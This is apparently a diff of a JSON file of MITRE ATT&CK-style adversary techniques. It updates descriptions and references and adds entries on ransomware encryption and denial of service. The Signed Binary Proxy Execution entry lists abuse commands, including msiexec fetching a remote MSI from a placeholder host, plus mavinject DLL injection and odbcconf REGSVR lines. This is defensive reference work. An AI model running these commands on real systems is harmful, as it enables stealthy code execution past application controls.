by the adversary. (Citation: Volexity PowerDuke November 2016) Adversaries may also used compressed or archived scripts, such as Javascript.", "meta": { "external_id": "T1140", "kill_chain": [ @@ -2266,8 +2307,8 @@ ], "refs": [ "https://attack.mitre.org/techniques/T1140", - "https://www.carbonblack.com/2016/09/23/security-advisory-variants-well-known-adware-families-discovered-include-sophisticated-obfuscation-techniques-previously-associated-nation-state-attacks/", "https://blog.malwarebytes.com/cybercrime/social-engineering-cybercrime/2017/03/new-targeted-attack-saudi-arabia-government/", + "https://www.carbonblack.com/2016/09/23/security-advisory-variants-well-known-adware-families-discovered-include-sophisticated-obfuscation-techniques-previously-associated-nation-state-attacks/", "https://www.volexity.com/blog/2016/11/09/powerduke-post-election-spear-phishing-campaigns-targeting-think-tanks-and-ngos/" ] }, @@ -2668,10 +2709,10 @@ "https://www.fireeye.com/blog/threat-research/2017/06/obfuscation-in-the-wild.html", "https://www.fireeye.com/content/dam/fireeye-www/blog/pdfs/revoke-obfuscation-report.pdf", "https://researchcenter.paloaltonetworks.com/2017/03/unit42-pulling-back-the-curtains-on-encodedcommand-powershell-attacks/", - "https://github.com/danielbohannon/Revoke-Obfuscation", - "https://github.com/itsreallynick/office-crackros", "https://en.wikipedia.org/wiki/Duqu", - "https://securingtomorrow.mcafee.com/mcafee-labs/malicious-document-targets-pyeongchang-olympics/" + "https://securingtomorrow.mcafee.com/mcafee-labs/malicious-document-targets-pyeongchang-olympics/", + "https://github.com/danielbohannon/Revoke-Obfuscation", + "https://github.com/itsreallynick/office-crackros" ] }, "uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", @@ -2836,7 +2877,7 @@ "value": "File System Permissions Weakness - T1044" }, { - "description": "An app could contain malicious code in obfuscated or encrypted form, then deobfuscate or decrypt the code at runtime to evade many app vetting techniques, as described in (Citation: Rastogi) (Citation: Zhou) (Citation: TrendMicro-Obad) (Citation: Xiao-iOS).", + "description": "An app could contain malicious code in obfuscated or encrypted form, then deobfuscate or decrypt the code at runtime to evade many app vetting techniques.(Citation: Rastogi) (Citation: Zhou) (Citation: TrendMicro-Obad) (Citation: Xiao-iOS)", "meta": { "external_id": "APP-21", "kill_chain": [ @@ -2856,7 +2897,7 @@ ] }, "uuid": "d13fa042-8f26-44e1-a2a8-af0bf8e2ac9a", - "value": "Obfuscated or Encrypted Payload - T1406" + "value": "Obfuscated Files or Information - T1406" }, { "description": "An adversary who is able to obtain unauthorized access to or misuse authorized access to cloud backup services (e.g. Google's Android backup service or Apple's iCloud) could use that access to obtain sensitive data stored in device backups. For example, the Elcomsoft Phone Breaker product advertises the ability to retrieve iOS backup data from Apple's iCloud (Citation: Elcomsoft-EPPB). Elcomsoft also describes (Citation: Elcomsoft-WhatsApp) obtaining WhatsApp communication histories from backups stored in iCloud.", @@ -3123,7 +3164,7 @@ "value": "Exploitation for Credential Access - T1212" }, { - "description": "The (Citation: Microsoft Component Object Model) (COM) is a system within Windows to enable interaction between software components through the operating system. (Citation: Microsoft Component Object Model) Adversaries can use this system to insert malicious code that can be executed in place of legitimate software through hijacking the COM references and relationships as a means for persistence. Hijacking a COM object requires a change in the Windows Registry to replace a reference to a legitimate system component which may cause that component to not work when executed. When that system component is executed through normal system operation the adversary's code will be executed instead. (Citation: GDATA COM Hijacking) An adversary is likely to hijack objects that are used frequently enough to maintain a consistent level of persistence, but are unlikely to break noticeable functionality within the system as to avoid system instability that could lead to detection.", + "description": "The Component Object Model (COM) is a system within Windows to enable interaction between software components through the operating system. (Citation: Microsoft Component Object Model) Adversaries can use this system to insert malicious code that can be executed in place of legitimate software through hijacking the COM references and relationships as a means for persistence. Hijacking a COM object requires a change in the Windows Registry to replace a reference to a legitimate system component which may cause that component to not work when executed. When that system component is executed through normal system operation the adversary's code will be executed instead. (Citation: GDATA COM Hijacking) An adversary is likely to hijack objects that are used frequently enough to maintain a consistent level of persistence, but are unlikely to break noticeable functionality within the system as to avoid system instability that could lead to detection.", "meta": { "external_id": "T1122", "kill_chain": [ @@ -3191,7 +3232,7 @@ ] }, "uuid": "dd818ea5-adf5-41c7-93b5-f3b839a219fb", - "value": "Local Network Connections Discovery - T1421" + "value": "System Network Connections Discovery - T1421" }, { "description": "Loadable Kernel Modules (or LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. For example, one type of module is the device driver, which allows the kernel to access hardware connected to the system. (Citation: Linux Kernel Programming) When used maliciously, Loadable Kernel Modules (LKMs) can be a type of kernel-mode [Rootkit](https://attack.mitre.org/techniques/T1014) that run with the highest operating system privilege (Ring 0). (Citation: Linux Kernel Module Programming Guide) Adversaries can use loadable kernel modules to covertly persist on a system and evade defenses. Examples have been found in the wild and there are some open source projects. (Citation: Volatility Phalanx2) (Citation: CrowdStrike Linux Rootkit) (Citation: GitHub Reptile) (Citation: GitHub Diamorphine)\n\nCommon features of LKM based rootkits include: hiding itself, selective hiding of files, processes and network activity, as well as log tampering, providing authenticated backdoors and enabling root access to non-privileged users. (Citation: iDefense Rootkit Overview)\n\nKernel extensions, also called kext, are used for macOS to load functionality onto a system similar to LKMs for Linux. They are loaded and unloaded through kextload and kextunload commands. Several examples have been found where this can be used. (Citation: RSAC 2015 San Francisco Patrick Wardle) (Citation: Synack Secure Kernel Extension Broken) Examples have been found in the wild. (Citation: Securelist Ventir)", @@ -3277,7 +3318,7 @@ "value": "Signed Script Proxy Execution - T1216" }, { - "description": "Binaries signed with trusted digital certificates can execute on Windows systems protected by digital signature validation. Several Microsoft signed binaries that are default on Windows installations can be used to proxy execution of other files. This behavior may be abused by adversaries to execute malicious files that could bypass application whitelisting and signature validation on systems. This technique accounts for proxy execution methods that are not already accounted for within the existing techniques.\n\n### Mavinject.exe\nMavinject.exe is a Windows utility that allows for code execution. Mavinject can be used to input a DLL into a running process. (Citation: Twitter gN3mes1s Status Update MavInject32)\n\n\"C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\MavInject32.exe\" /INJECTRUNNING \nC:\\Windows\\system32\\mavinject.exe /INJECTRUNNING \n\n### SyncAppvPublishingServer.exe\nSyncAppvPublishingServer.exe can be used to run powershell scripts without executing powershell.exe. (Citation: Twitter monoxgas Status Update SyncAppvPublishingServer)\n\nSeveral others binaries exist that may be used to perform similar behavior. (Citation: GitHub Ultimate AppLocker Bypass List)", + "description": "Binaries signed with trusted digital certificates can execute on Windows systems protected by digital signature validation. Several Microsoft signed binaries that are default on Windows installations can be used to proxy execution of other files. This behavior may be abused by adversaries to execute malicious files that could bypass application whitelisting and signature validation on systems. This technique accounts for proxy execution methods that are not already accounted for within the existing techniques.\n\n### Msiexec.exe\nMsiexec.exe is the command-line Windows utility for the Windows Installer. Adversaries may use msiexec.exe to launch malicious MSI files for code execution. An adversary may use it to launch local or network accessible MSI files.(Citation: LOLBAS Msiexec)(Citation: Rancor Unit42 June 2018)(Citation: TrendMicro Msiexec Feb 2018) Msiexec.exe may also be used to execute DLLs.(Citation: LOLBAS Msiexec)\n\n* msiexec.exe /q /i \"C:\\path\\to\\file.msi\"\n* msiexec.exe /q /i http[:]//site[.]com/file.msi\n* msiexec.exe /y \"C:\\path\\to\\file.dll\"\n\n### Mavinject.exe\nMavinject.exe is a Windows utility that allows for code execution. Mavinject can be used to input a DLL into a running process. (Citation: Twitter gN3mes1s Status Update MavInject32)\n\n* \"C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\MavInject32.exe\" <PID> /INJECTRUNNING <PATH DLL>\n* C:\\Windows\\system32\\mavinject.exe <PID> /INJECTRUNNING <PATH DLL>\n\n### SyncAppvPublishingServer.exe\nSyncAppvPublishingServer.exe can be used to run PowerShell scripts without executing powershell.exe. (Citation: Twitter monoxgas Status Update SyncAppvPublishingServer)\n\n### Odbcconf.exe\nOdbcconf.exe is a Windows utility that allows you to configure Open Database Connectivity (ODBC) drivers and data source names.(Citation: Microsoft odbcconf.exe) The utility can be misused to execute functionality equivalent to [Regsvr32](https://attack.mitre.org/techniques/T1117) with the REGSVR option to execute a DLL.(Citation: LOLBAS Odbcconf)(Citation: TrendMicro Squiblydoo Aug 2017)(Citation: TrendMicro Cobalt Group Nov 2017)\n\n* odbcconf.exe /S /A {REGSVR \"C:\\Users\\Public\\file.dll\"}\n\nSeveral other binaries exist that may be used to perform similar behavior. (Citation: GitHub Ultimate AppLocker Bypass List)", "meta": { "external_id": "T1218", "kill_chain": [ @@ -3293,8 +3334,15 @@ ], "refs": [ "https://attack.mitre.org/techniques/T1218", + "https://lolbas-project.github.io/lolbas/Binaries/Msiexec/", + "https://researchcenter.paloaltonetworks.com/2018/06/unit42-rancor-targeted-attacks-south-east-asia-using-plaintee-ddkong-malware-families/", + "https://blog.trendmicro.com/trendlabs-security-intelligence/attack-using-windows-installer-msiexec-exe-leads-lokibot/", "https://twitter.com/gn3mes1s/status/941315826107510784", "https://twitter.com/monoxgas/status/895045566090010624", + "https://docs.microsoft.com/en-us/sql/odbc/odbcconf-exe?view=sql-server-2017", + "https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/", + "https://blog.trendmicro.com/trendlabs-security-intelligence/backdoor-carrying-emails-set-sights-on-russian-speaking-businesses/", + "https://blog.trendmicro.com/trendlabs-security-intelligence/cobalt-spam-runs-use-macros-cve-2017-8759-exploit/", "https://github.com/api0cradle/UltimateAppLockerByPassList" ] }, @@ -3302,7 +3350,7 @@ "value": "Signed Binary Proxy Execution - T1218" }, { - "description": "The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like CreateProcess(), LoadLibrary(), etc. of the Win32 API. (Citation: Wikipedia Windows Library Files)\n\nThe module loader can load DLLs:\n\n* via specification of the (fully-qualified or relative) DLL pathname in the IMPORT directory;\n \n* via EXPORT forwarded to another DLL, specified with (fully-qualified or relative) pathname (but without extension);\n \n* via an NTFS junction or symlink program.exe.local with the fully-qualified or relative pathname of a directory containing the DLLs specified in the IMPORT directory or forwarded EXPORTs;\n \n* via in an embedded or external \"application manifest\". The file name refers to an entry in the IMPORT directory or a forwarded EXPORT.\n\nAdversaries can use this functionality as a way to execute arbitrary code on a system.", + "description": "The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like CreateProcess(), LoadLibrary(), etc. of the Win32 API. (Citation: Wikipedia Windows Library Files)\n\nThe module loader can load DLLs:\n\n* via specification of the (fully-qualified or relative) DLL pathname in the IMPORT directory;\n \n* via EXPORT forwarded to another DLL, specified with (fully-qualified or relative) pathname (but without extension);\n \n* via an NTFS junction or symlink program.exe.local with the fully-qualified or relative pathname of a directory containing the DLLs specified in the IMPORT directory or forwarded EXPORTs;\n \n* via <file name=\"filename.extension\" loadFrom=\"fully-qualified or relative pathname\"> in an embedded or external \"application manifest\". The file name refers to an entry in the IMPORT directory or a forwarded EXPORT.\n\nAdversaries can use this functionality as a way to execute arbitrary code on a system.", "meta": { "external_id": "T1129", "kill_chain": [ @@ -3381,24 +3429,6 @@ "uuid": "357e137c-7589-4af1-895c-3fbad35ea4d2", "value": "Obfuscate or encrypt code - T1319" }, - { - "description": "An adversary may encrypt files stored on the mobile device to prevent the user from accessing them, only unlocking access to the files after a ransom is paid. Without escalated privileges, the adversary is generally limited to only encrypting files in external/shared storage locations. This technique has been demonstrated on Android, and we are unaware of any demonstrated use on iOS.", - "meta": { - "external_id": "APP-28", - "kill_chain": [ - "mitre-mobile-attack:effects" - ], - "mitre_platforms": [ - "Android" - ], - "refs": [ - "https://attack.mitre.org/techniques/T1471", - "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-28.html" - ] - }, - "uuid": "d9e88203-2b5d-405f-a406-2933b1e3d7e4", - "value": "Encrypt Files for Ransom - T1471" - }, { "description": "Windows Distributed Component Object Model (DCOM) is transparent middleware that extends the functionality of Component Object Model (COM) (Citation: Microsoft COM) beyond a local computer using remote procedure call (RPC) technology. COM is a component of the Windows application programming interface (API) that enables interaction between software objects. Through COM, a client object can call methods of server objects, which are typically Dynamic Link Libraries (DLL) or executables (EXE).\n\nPermissions to interact with local and remote server COM objects are specified by access control lists (ACL) in the Registry. (Citation: Microsoft COM ACL) (Citation: Microsoft Process Wide Com Keys) (Citation: Microsoft System Wide Com Keys) By default, only Administrators may remotely activate and launch COM objects through DCOM.\n\nAdversaries may use DCOM for lateral movement. Through DCOM, adversaries operating in the context of an appropriately privileged user can remotely obtain arbitrary and even direct shellcode execution through Office applications (Citation: Enigma Outlook DCOM Lateral Movement Nov 2017) as well as other Windows objects that contain insecure methods. (Citation: Enigma MMC20 COM Jan 2017) (Citation: Enigma DCOM Lateral Movement Jan 2017) DCOM can also execute macros in existing documents (Citation: Enigma Excel DCOM Sept 2017) and may also invoke [Dynamic Data Exchange](https://attack.mitre.org/techniques/T1173) (DDE) execution directly through a COM created instance of a Microsoft Office application (Citation: Cyberreason DCOM DDE Lateral Movement Nov 2017), bypassing the need for a malicious document.\n\nDCOM may also expose functionalities that can be leveraged during other areas of the adversary chain of activity such as Privilege Escalation and Persistence. (Citation: ProjectZero File Write EoP Apr 2018)", "meta": { @@ -3507,7 +3537,7 @@ ] }, "uuid": "d4536441-1bcc-49fa-80ae-a596ed3f7ffd", - "value": "Local Network Configuration Discovery - T1422" + "value": "System Network Configuration Discovery - T1422" }, { "description": "Analysts identify gap areas that generate a compelling need to generate a Key Intelligence Topic (KIT) or Key Intelligence Question (KIQ). (Citation: BrighthubGapAnalysis) (Citation: ICD115) (Citation: JP2-01)", @@ -3707,7 +3737,7 @@ "value": "Post compromise tool development - T1353" }, { - "description": "Adversaries may communicate using a common, standardized application layer protocol such as HTTP, HTTPS, SMTP, or DNS to avoid detection by blending in with existing traffic.\n\nIn the mobile environment, the Google Cloud Messaging (GCM; two-way) and Apple Push Notification Service (APNS; one-way server-to-device) are commonly used protocols on Android and iOS respectively that would blend in with routine device traffic and are difficult for enterprises to inspect. As described by Kaspersky (Citation: Kaspersky-MobileMalware), Google responds to reports of abuse by blocking access to GCM.", + "description": "Adversaries may communicate using a common, standardized application layer protocol such as HTTP, HTTPS, SMTP, or DNS to avoid detection by blending in with existing traffic.\n\nIn the mobile environment, the Google Cloud Messaging (GCM; two-way) and Apple Push Notification Service (APNS; one-way server-to-device) are commonly used protocols on Android and iOS respectively that would blend in with routine device traffic and are difficult for enterprises to inspect. Google reportedly responds to reports of abuse by blocking access to GCM.(Citation: Kaspersky-MobileMalware)", "meta": { "external_id": "APP-29", "kill_chain": [ @@ -3770,7 +3800,7 @@ "value": "Targeted social media phishing - T1366" }, { - "description": "If an adversary can escalate privileges, he or she may be able to use those privileges to place malicious code in the device's Trusted Execution Environment (TEE) or other similar isolated execution environment where the code can evade detection, may persist after device resets, and may not be removable by the device user. Running code within the TEE may provide an adversary with the ability to monitor or tamper with overall device behavior.\n\nThomas Roth describes the potential for placing a rootkit within the TrustZone secure world (Citation: Roth-Rootkits).", + "description": "If an adversary can escalate privileges, he or she may be able to use those privileges to place malicious code in the device's Trusted Execution Environment (TEE) or other similar isolated execution environment where the code can evade detection, may persist after device resets, and may not be removable by the device user. Running code within the TEE may provide an adversary with the ability to monitor or tamper with overall device behavior.(Citation: Roth-Rootkits)", "meta": { "external_id": "APP-27", "kill_chain": [ @@ -3791,7 +3821,7 @@ "value": "Modify Trusted Execution Environment - T1399" }, { - "description": "A malicious app could use standard Android APIs to send SMS messages. SMS messages could potentially be sent to premium numbers that charge the device owner and generate revenue for an adversary, for example as described by Lookout in (Citation: Lookout-SMS).\n\nOn iOS, apps cannot send SMS messages.\n\nOn Android, apps must hold the SEND_SMS permission to send SMS messages. Additionally, Android version 4.2 and above has mitigations against this threat by requiring user consent before allowing SMS messages to be sent to premium numbers (Citation: AndroidSecurity2014).", + "description": "A malicious app could use standard Android APIs to send SMS messages. SMS messages could potentially be sent to premium numbers that charge the device owner and generate revenue for an adversary(Citation: Lookout-SMS).\n\nOn iOS, apps cannot send SMS messages.\n\nOn Android, apps must hold the SEND_SMS permission to send SMS messages. Additionally, Android version 4.2 and above has mitigations against this threat by requiring user consent before allowing SMS messages to be sent to premium numbers (Citation: AndroidSecurity2014).", "meta": { "external_id": "T1448", "kill_chain": [ @@ -3810,7 +3840,7 @@ "value": "Premium SMS Toll Fraud - T1448" }, { - "description": "An adversary could cause the mobile device to use less secure protocols, for example by jamming frequencies used by newer protocols such as LTE and only allowing older protocols such as GSM to communicate as described in NIST SP 800-187 (Citation: NIST-SP800187). Use of less secure protocols may make communication easier to eavesdrop upon or manipulate.", + "description": "An adversary could cause the mobile device to use less secure protocols, for example by jamming frequencies used by newer protocols such as LTE and only allowing older protocols such as GSM to communicate(Citation: NIST-SP800187). Use of less secure protocols may make communication easier to eavesdrop upon or manipulate.", "meta": { "external_id": "CEL-3", "kill_chain": [ @@ -3830,7 +3860,7 @@ "value": "Downgrade to Insecure Protocols - T1466" }, { - "description": "An adversary could set up a rogue cellular base station and then use it to eavesdrop on or manipulate cellular device communication. For example, Ritter and DePerry of iSEC Partners demonstrated this technique using a compromised cellular femtocell at Black Hat USA 2013 (Citation: Computerworld-Femtocell).", + "description": "An adversary could set up a rogue cellular base station and then use it to eavesdrop on or manipulate cellular device communication. A compromised cellular femtocell could be used to carry out this technique(Citation: Computerworld-Femtocell).", "meta": { "external_id": "CEL-7", "kill_chain": [ @@ -3850,7 +3880,36 @@ "value": "Rogue Cellular Base Station - T1467" }, { - "description": "The mobile device may be targeted for exploitation through its interface to cellular networks or other radio interfaces.\n\n### Baseband Vulnerability Exploitation\n\nA message sent over a radio interface (typically cellular, but potentially Bluetooth, GPS, NFC, Wi-Fi or other) to the mobile device could exploit a vulnerability in code running on the device. D. Komaromy and N. Golde demonstrated baseband exploitation of a Samsung mobile device at the PacSec 2015 security conference. (Citation: Register-BaseStation) Weinmann described and demonstrated \"the risk of remotely exploitable memory corruptions in cellular baseband stacks.\" (Citation: Weinmann-Baseband)\n\n### Malicious SMS Message\n\nAn SMS message could contain content designed to exploit vulnerabilities in the SMS parser on the receiving device. For example, Mulliner and Miller demonstrated such an attack against the iPhone in 2009. (Citation: Forbes-iPhoneSMS) An SMS message could also contain a link to a web site containing malicious content designed to exploit the device web browser. Vulnerable SIM cards may be remotely exploited and reprogrammed via SMS messages. (Citation: SRLabs-SIMCard)", + "description": "Adversaries may encrypt data on target systems or on large numbers of systems in a network to interrupt availability to system and network resources. They can attempt to render stored data inaccessible by encrypting files or data on local and remote drives and withholding access to a decryption key. This may be done in order to extract monetary compensation from a victim in exchange for decryption or a decryption key (ransomware) or to render data permanently inaccessible in cases where the key is not saved or transmitted.(Citation: US-CERT Ransomware 2016)(Citation: FireEye WannaCry 2017)(Citation: US-CERT NotPetya 2017)(Citation: US-CERT SamSam 2018) In the case of ransomware, it is typical that common user files like Office documents, PDFs, images, videos, audio, text, and source code files will be encrypted. In some cases, adversaries may encrypt critical system files, disk partitions, and the MBR.(Citation: US-CERT NotPetya 2017)\n\nTo maximize impact on the target organization, malware designed for encrypting data may have worm-like features to propagate across a network by leveraging other attack techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [Credential Dumping](https://attack.mitre.org/techniques/T1003), and [Windows Admin Shares](https://attack.mitre.org/techniques/T1077).(Citation: FireEye WannaCry 2017)(Citation: US-CERT NotPetya 2017)", + "meta": { + "external_id": "T1486", + "kill_chain": [ + "mitre-attack:impact" + ], + "mitre_data_sources": [ + "Kernel drivers", + "File monitoring", + "Process command-line parameters", + "Process monitoring" + ], + "mitre_platforms": [ + "Linux", + "macOS", + "Windows" + ], + "refs": [ + "https://attack.mitre.org/techniques/T1486", + "https://www.us-cert.gov/ncas/alerts/TA16-091A", + "https://www.fireeye.com/blog/threat-research/2017/05/wannacry-malware-profile.html", + "https://www.us-cert.gov/ncas/alerts/TA17-181A", + "https://www.us-cert.gov/ncas/alerts/AA18-337A" + ] + }, + "uuid": "b80d107d-fa0d-4b60-9684-b0433e8bdba0", + "value": "Data Encrypted for Impact - T1486" + }, + { + "description": "The mobile device may be targeted for exploitation through its interface to cellular networks or other radio interfaces.\n\n### Baseband Vulnerability Exploitation\n\nA message sent over a radio interface (typically cellular, but potentially Bluetooth, GPS, NFC, Wi-Fi(Citation: ProjectZero-BroadcomWiFi) or other) to the mobile device could exploit a vulnerability in code running on the device(Citation: Register-BaseStation)(Citation: Weinmann-Baseband).\n\n### Malicious SMS Message\n\nAn SMS message could contain content designed to exploit vulnerabilities in the SMS parser on the receiving device(Citation: Forbes-iPhoneSMS). An SMS message could also contain a link to a web site containing malicious content designed to exploit the device web browser. Vulnerable SIM cards may be remotely exploited and reprogrammed via SMS messages(Citation: SRLabs-SIMCard).", "meta": { "external_id": "T1477", "kill_chain": [ @@ -3862,6 +3921,7 @@ ], "refs": [ "https://attack.mitre.org/techniques/T1477", + "https://googleprojectzero.blogspot.com/2017/04/over-air-exploiting-broadcoms-wi-fi_4.html", "http://www.theregister.co.uk/2015/11/12/mobile_pwn2own1/", "https://www.usenix.org/system/files/conference/woot12/woot12-final24.pdf", "http://www.forbes.com/2009/07/28/hackers-iphone-apple-technology-security-hackers.html", @@ -3871,6 +3931,86 @@ "uuid": "2d646840-f6f5-4619-a5a8-29c8316bbac5", "value": "Exploit via Radio Interfaces - T1477" }, + { + "description": "Adversaries may perform Network Denial of Service (DoS) attacks to degrade or block the availability of targeted resources to users. Network DoS can be performed by exhausting the network bandwidth services rely on. Example resources include specific websites, email services, DNS, and web-based applications. Adversaries have been observed conducting network DoS attacks for political purposes(Citation: FireEye OpPoisonedHandover February 2016) and to support other malicious activities, including distraction(Citation: FSISAC FraudNetDoS September 2012), hacktivism, and extortion.(Citation: Symantec DDoS October 2014)\n\nA Network DoS will occur when the bandwidth capacity of the network connection to a system is exhausted due to the volume of malicious traffic directed at the resource or the network connections and network devices the resource relies on. For example, an adversary may send 10Gbps of traffic to a server that is hosted by a network with a 1Gbps connection to the internet. This traffic can be generated by a single system or multiple systems spread across the internet, which is commonly referred to as a distributed DoS (DDoS). Many different methods to accomplish such network saturation have been observed, but most fall into two main categories: Direct Network Floods and Reflection Amplification.\n\nTo perform Network DoS attacks several aspects apply to multiple methods, including IP address spoofing, and botnets.\n\nAdversaries may use the original IP address of an attacking system, or spoof the source IP address to make the attack traffic more difficult to trace back to the attacking system or to enable reflection. This can increase the difficulty defenders have in defending against the attack by reducing or eliminating the effectiveness of filtering by the source address on network defense devices.\n\nBotnets are commonly used to conduct DDoS attacks against networks and services. Large botnets can generate a significant amount of traffic from systems spread across the global internet. Adversaries may have the resources to build out and control their own botnet infrastructure or may rent time on an existing botnet to conduct an attack. In some of the worst cases for DDoS, so many systems are used to generate the flood that each one only needs to send out a small amount of traffic to produce enough volume to saturate the target network. In such circumstances, distinguishing DDoS traffic from legitimate clients becomes exceedingly difficult. Botnets have been used in some of the most high-profile DDoS attacks, such as the 2012 series of incidents that targeted major US banks.(Citation: USNYAG IranianBotnet March 2016)\n\nFor DoS attacks targeting the hosting system directly, see [Endpoint Denial of Service](https://attack.mitre.org/techniques/T1499).\n\n###Direct Network Flood###\n\nDirect Network Floods are when one or more systems are used to send a high-volume of network packets towards the targeted service's network. Almost any network protocol may be used for Direct Network Floods. Stateless protocols such as UDP or ICMP are commonly used but stateful protocols such as TCP can be used as well.\n\n###Reflection Amplification###\n\nAdversaries may amplify the volume of their attack traffic by using Reflection. This type of Network DoS takes advantage of a third-party server intermediary that hosts and will respond to a given spoofed source IP address. This third-party server is commonly termed a reflector. An adversary accomplishes a reflection attack by sending packets to reflectors with the spoofed address of the victim. Similar to Direct Network Floods, more than one system may be used to conduct the attack, or a botnet may be used. Likewise, one or more reflector may be used to focus traffic on the target.(Citation: Cloudflare ReflectionDoS May 2017)\n\nReflection attacks often take advantage of protocols with larger responses than requests in order to amplify their traffic, commonly known as a Reflection Amplification attack. Adversaries may be able to generate an increase in volume of attack traffic that is several orders of magnitude greater than the requests sent to the amplifiers. The extent of this increase will depending upon many variables, such as the protocol in question, the technique used, and the amplifying servers that actually produce the amplification in attack volume. Two prominent protocols that have enabled Reflection Amplification Floods are DNS(Citation: Cloudflare DNSamplficationDoS) and NTP(Citation: Cloudflare NTPamplifciationDoS), though the use of several others in the wild have been documented.(Citation: Arbor AnnualDoSreport Jan 2018) In particular, the memcache protocol showed itself to be a powerful protocol, with amplification sizes up to 51,200 times the requesting packet.(Citation: Cloudflare Memcrashed Feb 2018)", + "meta": { + "external_id": "T1498", + "kill_chain": [ + "mitre-attack:impact" + ], + "mitre_data_sources": [ + "Sensor health and status", + "Network protocol analysis", + "Netflow/Enclave netflow", + "Network intrusion detection system", + "Network device logs" + ], + "mitre_platforms": [ + "Linux", + "macOS", + "Windows" + ], + "refs": [ + "https://attack.mitre.org/techniques/T1498", + "https://www.fireeye.com/blog/threat-research/2014/11/operation-poisoned-handover-unveiling-ties-between-apt-activity-in-hong-kongs-pro-democracy-movement.html", + "https://www.ic3.gov/media/2012/FraudAlertFinancialInstitutionEmployeeCredentialsTargeted.pdf", + "https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-continued-rise-of-ddos-attacks.pdf", + "https://www.justice.gov/opa/pr/seven-iranians-working-islamic-revolutionary-guard-corps-affiliated-entities-charged", + "https://blog.cloudflare.com/reflections-on-reflections/", + "https://www.cloudflare.com/learning/ddos/dns-amplification-ddos-attack/", + "https://www.cloudflare.com/learning/ddos/ntp-amplification-ddos-attack/", + "https://pages.arbornetworks.com/rs/082-KNA-087/images/13th_Worldwide_Infrastructure_Security_Report.pdf", + "https://blog.cloudflare.com/memcrashed-major-amplification-attacks-from-port-11211/", + "https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf" + ] + }, + "uuid": "d74c4a7e-ffbf-432f-9365-7ebf1f787cab", + "value": "Network Denial of Service - T1498" + }, + { + "description": "Adversaries may perform Endpoint Denial of Service (DoS) attacks to degrade or block the availability of services to users. Endpoint DoS can be performed by exhausting the system resources those services are hosted on or exploiting the system to cause a persistent crash condition. Example services include websites, email services, DNS, and web-based applications. Adversaries have been observed conducting DoS attacks for political purposes(Citation: FireEye OpPoisonedHandover February 2016) and to support other malicious activities, including distraction(Citation: FSISAC FraudNetDoS September 2012), hacktivism, and extortion.(Citation: Symantec DDoS October 2014)\n\nAn Endpoint DoS denies the availability of a service without saturating the network used to provide access to the service. Adversaries can target various layers of the application stack that is hosted on the system used to provide the service. These layers include the Operating Systems (OS), server applications such as web servers, DNS servers, databases, and the (typically web-based) applications that sit on top of them. Attacking each layer requires different techniques that take advantage of bottlenecks that are unique to the respective components. A DoS attack may be generated by a single system or multiple systems spread across the internet, which is commonly referred to as a distributed DoS (DDoS).\n\nTo perform DoS attacks against endpoint resources, several aspects apply to multiple methods, including IP address spoofing and botnets.\n\nAdversaries may use the original IP address of an attacking system, or spoof the source IP address to make the attack traffic more difficult to trace back to the attacking system or to enable reflection. This can increase the difficulty defenders have in defending against the attack by reducing or eliminating the effectiveness of filtering by the source address on network defense devices.\n\nBotnets are commonly used to conduct DDoS attacks against networks and services. Large botnets can generate a significant amount of traffic from systems spread across the global internet. Adversaries may have the resources to build out and control their own botnet infrastructure or may rent time on an existing botnet to conduct an attack. In some of the worst cases for DDoS, so many systems are used to generate requests that each one only needs to send out a small amount of traffic to produce enough volume to exhaust the target's resources. In such circumstances, distinguishing DDoS traffic from legitimate clients becomes exceedingly difficult. Botnets have been used in some of the most high-profile DDoS attacks, such as the 2012 series of incidents that targeted major US banks.(Citation: USNYAG IranianBotnet March 2016)\n\nIn cases where traffic manipulation is used, there may be points in the the global network (such as high traffic gateway routers) where packets can be altered and cause legitimate clients to execute code that directs network packets toward a target in high volume. This type of capability was previously used for the purposes of web censorship where client HTTP traffic was modified to include a reference to JavaScript that generated the DDoS code to overwhelm target web servers.(Citation: ArsTechnica Great Firewall of China)\n\nFor attacks attempting to saturate the providing network, see the Network Denial of Service Technique [Network Denial of Service](https://attack.mitre.org/techniques/T1498).\n\n### OS Exhaustion Flood\nSince operating systems (OSs) are responsible for managing the finite resources on a system, they can be a target for DoS. These attacks do not need to exhaust the actual resources on a system since they can simply exhaust the limits that an OS self-imposes to prevent the entire system from being overwhelmed by excessive demands on its capacity. Different ways to achieve this exist, including TCP state-exhaustion attacks such as SYN floods and ACK floods.(Citation: Arbor AnnualDoSreport Jan 2018)\n\n#### SYN Flood\nWith SYN floods excessive amounts of SYN packets are sent, but the 3-way TCP handshake is never completed. Because each OS has a maximum number of concurrent TCP connections that it will allow, this can quickly exhaust the ability of the system to receive new requests for TCP connections, thus preventing access to any TCP service provided by the server.(Citation: Cloudflare SynFlood)\n\n#### ACK Flood\nACK floods leverage the stateful nature of the TCP protocol. A flood of ACK packets are sent to the target. This forces the OS to search its state table for a related TCP connection that has already been established. Because the ACK packets are for connections that do not exist, the OS will have to search the entire state table to confirm that no match exists. When it is necessary to do this for a large flood of packets, the computational requirements can cause the server to become sluggish and/or unresponsive, due to the work it must do to eliminate the rogue ACK packets. This greatly reduces the resources available for providing the targeted service.(Citation: Corero SYN-ACKflood)\n\n### Service Exhaustion Flood\nDifferent network services provided by systems are targeted in different ways to conduct a DoS. Adversaries often target DNS and web servers, but other services have been targeted as well.(Citation: Arbor AnnualDoSreport Jan 2018) Web server software can be attacked through a variety of means, some of which apply generally while others are specific to the software being used to provide the service.\n\n#### Simple HTTP Flood\nA large number of HTTP requests can be issued to a web server to overwhelm it and/or an application that runs on top of it. This flood relies on raw volume to accomplish the objective, exhausting any of the various resources required by the victim software to provide the service.(Citation: Cloudflare 